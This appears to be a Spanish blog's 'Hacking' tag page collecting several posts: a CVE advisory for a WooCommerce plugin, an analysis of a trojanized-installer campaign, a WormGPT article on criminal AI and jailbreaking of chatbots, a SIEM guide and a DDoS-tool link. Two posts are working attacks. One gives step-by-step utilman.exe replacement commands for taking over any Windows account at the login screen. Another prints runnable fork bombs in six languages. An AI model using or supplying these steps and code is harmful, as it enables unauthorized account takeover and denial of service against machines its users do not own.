Mostrando las entradas con la etiqueta Hacking. Mostrar todas las entradas
Mostrando las entradas con la etiqueta Hacking. Mostrar todas las entradas

Vulnerabilidad crítica para Woocommerce

 

El 11 de marzo de 2025, se identificó una vulnerabilidad crítica en el popular plugin de WordPress "HUSKY – WooCommerce Products Filter Professional" (anteriormente conocido como WOOF), que afecta a más de 100,000 tiendas en línea. Esta vulnerabilidad, catalogada como CVE-2025-1661 con una puntuación CVSS de 9.8, permite a atacantes no autenticados ejecutar archivos arbitrarios en servidores afectados, lo que podría resultar en brechas de datos, desfiguración de sitios y control total del sistema.

Detalles de la Vulnerabilidad

La falla reside en una vulnerabilidad de Inclusión Local de Archivos (LFI) presente en versiones del plugin hasta la 1.3.6.5 inclusive. Esta vulnerabilidad se encuentra en el parámetro 'template' de la acción AJAX 'woof_text_search', lo que permite a actores malintencionados inyectar y ejecutar cualquier código PHP presente en el servidor.

Impacto Potencial

La explotación de esta vulnerabilidad puede tener consecuencias graves, incluyendo:

  • Robo de datos sensibles: Información de clientes como nombres, direcciones, datos de pago e historiales de pedidos podrían ser comprometidos.

  • Inyección de código malicioso: Esto podría llevar a la desfiguración del sitio, redirección a sitios de phishing o instalación de puertas traseras para acceso persistente.

  • Control completo del servidor: En casos donde los atacantes puedan cargar e incluir tipos de archivos "seguros", como imágenes con código malicioso incrustado, podrían obtener control total del servidor.

Medidas de Mitigación

Se recomienda encarecidamente a los propietarios de tiendas en línea que utilicen este plugin que actualicen inmediatamente a la versión 1.3.6.6, la cual incluye una solución para esta vulnerabilidad.

Conclusión

La detección de la vulnerabilidad CVE-2025-1661 destaca la importancia de mantener actualizados los plugins y sistemas de gestión de contenido. La rápida acción para parchear y actualizar componentes vulnerables es esencial para proteger la integridad y seguridad de las plataformas de comercio electrónico.

Fuentes: 

A continuación se presentan las fuentes utilizadas en el artículo, junto con sus respectivos enlaces:

  • Base de Datos Nacional de Vulnerabilidades (NVD): Proporciona detalles técnicos sobre la vulnerabilidad CVE-2025-1661.

  • Security Online: Informa sobre la vulnerabilidad crítica que afecta a más de 100,000 sitios de WooCommerce.

  • SecAlerts: Ofrece información sobre la inclusión de archivos locales no autenticados relacionada con CVE-2025-1661.

  • Wordfence: Base de datos de vulnerabilidades de WordPress que incluye información sobre CVE-2025-1661.

  • GitHub Advisory Database: Contiene detalles sobre la vulnerabilidad CVE-2025-1661 en el plugin HUSKY.

Estas fuentes proporcionan información detallada y técnica sobre la vulnerabilidad CVE-2025-1661 y sus implicaciones para los sitios que utilizan el plugin HUSKY – WooCommerce Products Filter Professional.


 

Cómo hackear cualquier usuario de Windows

 

Este artículo es ideal para ayudarte a recuperar tu contraseña. A continuación te muestro los pasos para llevar a cabo ésta tarea:

1 💿 Inicia tu PC desde un medio de instalación de Windows (puede ser un DVD o una memoria USB).

2 🛠️ En la pantalla de instalación, presiona «Shift + F10». Esto abrirá una ventana de línea de comandos.

3 🗂️ En la línea de comandos, ve a la partición del sistema. Normalmente es la unidad ‘D:’ en este entorno. Puedes cambiar a la unidad ‘D:’ escribiendo D: y luego presionando Enter.

4 🔄 Una vez en la partición del sistema, ve al directorio ‘system32’ escribiendo cd \windows\system32 y luego presiona Enter.

5 📝 Ahora vas a renombrar el ‘utilman.exe’ escribiendo ren utilman.exe utilman.exe.old y luego presiona Enter.

6 🔗 Luego, crea un enlace simbólico a ‘cmd.exe’ desde ‘utilman.exe’ escribiendo copy cmd.exe utilman.exe y luego presiona Enter.

7 🔄 Reinicia el sistema.

8 💡 En la pantalla de inicio de sesión, haz clic en el icono de «accesibilidad» (normalmente aparece en la esquina inferior derecha). Esto abrirá una ventana de línea de comandos con privilegios de administrador.

9 👤 Para cambiar la contraseña del administrador, escribe net user Administrador * (reemplaza ‘Administrador’ con el nombre de usuario del administrador si es diferente). Luego presiona Enter.

10 🎯 Te pedirá que ingreses una nueva contraseña. Ingresa la nueva contraseña y presiona Enter. Confirma la contraseña y presiona Enter nuevamente.

Explicación

Es un fallo de seguridad que lleva DÉCADAS en windows, ya que te permite ejecutar una cmd con permisos en el sistema desde la pantalla de login,al clickar el símbolo de accesibilidad se llamará a «utilman.exe» el cual gracias al renombramiento es realmente una terminal de sistema que se ejecutara con privilegios de administrador al ser una llamada al mismo sistema, como lo haría el binario original de utilman.exe, al ejecutar esta terminal puedes introducir comandos como administrador, entre ellos el de cambiar contraseñas de usuario.

M3 Mini Rat

 

El atacante utiliza el Instalador avanzado para empaquetar otros instaladores de software legítimos, como Adobe Illustrator, Autodesk 3ds Max y SketchUp Pro, con scripts maliciosos y utiliza la función Acciones personalizadas del Instalador avanzado para hacer que los instaladores de software ejecuten los scripts maliciosos.

La naturaleza de las aplicaciones troyanizadas indica que las víctimas probablemente abarcan los sectores de arquitectura, ingeniería, construcción, manufactura y entretenimiento.

Los instaladores de software utilizan predominantemente el idioma francés, una señal de que se está señalando a los usuarios de habla francesa. Los datos de solicitud de DNS enviados a la infraestructura del atacante muestra que la huella de victimología se extiende por Francia y Suiza, seguida de infecciones esporádicas en EE. UU., Canadá, Argelia, Suecia, Alemania, Túnez, Madagascar, Singapur y Vietnam.

Los ataques culminan con la implementación de un M3_Mini_Rat, un script de PowerShell que probablemente actúa como una puerta trasera para descargar y ejecutar amenazas adicionales, así como múltiples familias de malware de minería de criptomonedas como PhoenixMiner y lolMiner.

En cuanto al vector de acceso inicial, se sospecha que se pueden haber empleado técnicas de envenenamiento de optimización de motores de búsqueda (SEO) para entregar los instaladores de software manipulados a las máquinas de la víctima.

El instalador, una vez iniciado, activa una cadena de ataque de varias etapas que elimina el código auxiliar del cliente M3_Mini_Rat y los archivos binarios del minero. «El cliente M3_Mini_Rat es un script de PowerShell con capacidades de administración remota que se centra principalmente en realizar reconocimiento del sistema y descargar y ejecutar otros archivos binarios maliciosos», dijo Raghuprasad.

El troyano está diseñado para contactar con un servidor remoto, aunque actualmente no responde, lo que dificulta determinar la naturaleza exacta del malware que pudo haberse distribuido a través de este proceso.

WormGPT la nueva arma de la Dark Web para realizar ciberataque

 

La nueva era de herramientas de inteligencia artificial nos demuestra lo que la tecnología es capaz de hacer en pleno 2023. No sólo hablamos de generadores de imágenes como Midjourney, por ejemplo, o de chatbots como ChatGPT, sino que también empezamos a vislumbrar un futuro en el que las estafas y los fraudes online sean una mezcla del ingenio de habilidosos hackers y de la eficacia de la IA.

Nueva herramienta para el mal online: WormGPT

Bajo este curioso nombre, que podría traducirse como GusanoGPT, nos encontramos con un módulo de inteligencia artificial que se asienta sobre las bases de un modelo de lenguaje de gran tamaño denominado GPT-J, que, además es de código abierto.

Este último detalle es fundamental para entender cómo un modelo de lenguaje de código abierto puede ser modificado por hackers con malas intenciones para eliminar ciertas restricciones de los modelos convencionales y así poder, por ejemplo, crear virus y malware con el beneplácito de una tecnología pensada para ayudar al ser humano.

Los ataques de phishing han sido una de las primeras utilidades dadas a esta IA criminal, aunque dadas sus múltiples habilidades, entre las que destacan el soporte de caracteres ilimitados o el formateo de código, parece que solamente estamos ante la antesala de lo que podría estar por venir.

Sin duda alguna, los más modernos chatbots están alucinando a millones de usuarios alrededor del mundo por una causa fundamental: la sencillez de uso de su interfaz. En este caso, imagina si existiese una herramienta similar, pero con la capacidad de causar daño sin ningún tipo de límite. Este es el verdadero peligro de WormGPT.

Eso sí, existen otros peligros fuera de WormGPT, como la posibilidad de corromper al propio ChatGPT para que realice acciones para las que no debería estar preparado. Y es que algunos hackers estarían utilizando el chatbot de OpenAI para extraer información sensible, generar contenido inapropiado o ejecutar códigos maliciosos.

La defensa contra este tipo de herramientas pasa por que los expertos en ciberseguridad utilicen los modelos de IA en su favor para detectar y contrarrestar este tipo de chatbots maliciosos y a los cibercriminales que utilizan la inteligencia artificial en favor de sus propios intereses. Además, la prevención y detección de cualquier tipo de estafa online debería ser uno de los grandes aspectos a integrar en la formación de cualquier tipo de trabajador.

Guía de implementación de un SIEM

 

🔹Definición de Objetivos/Requisitos: La organización debe establecer claramente sus objetivos de seguridad y los requisitos específicos que espera cumplir con la implementación del SIEM. Esto puede incluir la detección proactiva d amenazas, la conformidad con regulaciones o la mejora de la respuesta a incidentes

🔹Evaluación de Necesidades y Recursos: Es crucial evaluar las necesidades de la organización, así como los recursos disponibles. Esto implica analizar la infraestructura de IT existente,los flujos de datos y los sistemas críticos. Además, se debe considerar el nivel de madurez en ciberseguridad de la organización

🔹Selección de Proveedor y PoC: Se debe realizar una investigación exhaustiva para seleccionar un proveedor que se adapte a las necesidades. Es recomendable llevar a cabo una PoC para evaluar cómo la solución propuesta se integra con el entorno existente y si cumple con las expectativas

🔹Diseño de la Arquitectura: Una vez seleccionada la solución SIEM,se procede al diseño de la arquitectura. Esto implica determinar cómo se conectarán las diversas fuentes de información y cómo se estructurará la infra del SIEM. Se deben considerar factores como la escalabilidad, redundancia y la capacidad de manejar grandes volúmenes de datos

🔹Reglas de Detección: Una parte crítica de la implantación es la programación de reglas de detección. Estas reglas,especifican comportamientos y patrones que pueden indicar amenazas potenciales

🔹Definición del Alcance: Es esencial definir claramente el alcance del proyecto. Esto implica determinar qué sistemas, redes y eventos se monitorizarán y cómo se gestionarán las fases de implementación. Evitar extremos, como querer monitorizar todo desde el principio, es clave para un despliegue exitoso

🔹Desarrollo de Checklist/Procedimientos: Crear un checklist detallado y procedimientos ayuda a mantener el enfoque y garantizar que cada etapa de la implantación se complete de manera efectiva. Se debe incluir la evaluación continua del funcionamiento del SIEM y la incorporación de nuevas reglas según sea necesario

🔹Implementación Gradual y Fases del Proyecto: En muchos casos,la implementación del SIEM se realiza de manera gradual y en fases. Esto permite abordar los desafíos paso a paso, garantizando una transición suave y minimizando el impacto en las operaciones diarias

🔹Evaluación Continua y Mejora: Una vez implementado, el SIEM debe someterse a evaluaciones continuas. Esto implica revisar regularmente la eficacia de las reglas de detección, ajustar la configuración según sea necesario y garantizar que la solución esté actualizada con las últimas amenazas y vulnerabilidades

✅ Conclusión:
La implantación de un SIEM es un proceso complejo que requiere planificación meticulosa y adaptabilidad a las necesidades específicas de la organización. La combinación de una evaluación exhaustiva, diseño de arquitectura robusto y una implementación gradual contribuirá al éxito a largo plazo de la solución SIEM

Proyecto educativo: Herramienta para simular ataque DDoS

 

Este proyecto fue escrito en PHP, con el fin de permitir a los estudiantes en ciberseguridad, simular ataques DDoS. La herramienta ha sido escrita para fines educativos, esto quiere decir que los desarrolladores no se hacen responsables del mal uso que se le de a ésta.

Si deseas descargar la solución, puedes encontrarla en el repositorio oficial de github: https://github.com/rrcyber/DDoS

Bomba fork

 

 

Una bomba fork es una forma de ataque del tipo denegación de servicio sobre un computador implementando una operación fork o alguna otra funcionalidad equivalente mediante la cual un proceso es capaz de autorreplicarse. La bomba fork es considerado un wabbit ya que no se autorreplica de la misma forma que los gusanos o los virus. Su efecto se basa en la suposición de que el número de programas y procesos que se ejecutan simultáneamente en un ordenador tiene un límite.

Una bomba fork funciona creando una gran cantidad de procesos muy rápidamente con el objetivo de saturar el espacio disponible en la lista de procesos mantenida por el sistema operativo del computador. Si la tabla de procesos se llega a saturar, entonces no se pueden iniciar nuevos programas hasta que no se cierre alguno. En el caso de que esto suceda, es muy poco probable que se pueda iniciar un programa útil ya que los procesos de la bomba estarán esperando para poder crear nuevos procesos a la primera oportunidad que se les conceda.

Las bombas fork no sólo ocupan espacio dentro de la lista de procesos, también consumen tiempo de proceso y memoria de la máquina donde se ejecutan. Como resultado de esto, los ordenadores se vuelven lentos e incluso se pueden volver inutilizables dada la falta de memoria y la imposibilidad de aprovechar el procesador.

Se puede prevenir?

La respuesta es si. Afortunadamente para el usuario final, ya existen soluciones antivirus que cuentan con una protección para este tipo de ataques, tales como Kaspersky Endpoint Security.

El firewall y el sandbox embebidos en esta solución son capaces de detectar cualquier tipo de ataque en tiempo real, gracias a la sincronización de sus motores de análisis de amenazas con la nube Kaspersky Security Network.

Algunos ejemplos

Código fuente de una bomba fork programada en Batch funcional en cualquier versión de Microsoft Windows:

%0|%0

O bien, una reacción más rápida:

:s
start "" %0
goto :s

Código fuente de una bomba fork programada en UNIX C o C++:

#include <unistd.h>

int main()
 {
  while(true)
 {
    fork();
 }
  return 0;
}

Bomba fork para bash de linux

:(){ :|:& };:

O de forma larga

#!/bin/bash
bomba(){
  bomba | bomba & 
}
bomba

En Perl:

fork while fork

En Python:

import os

while True:
     os.fork()

En Ruby:

def forkbomb
  loop { fork { forkbomb }  }
end; forkbomb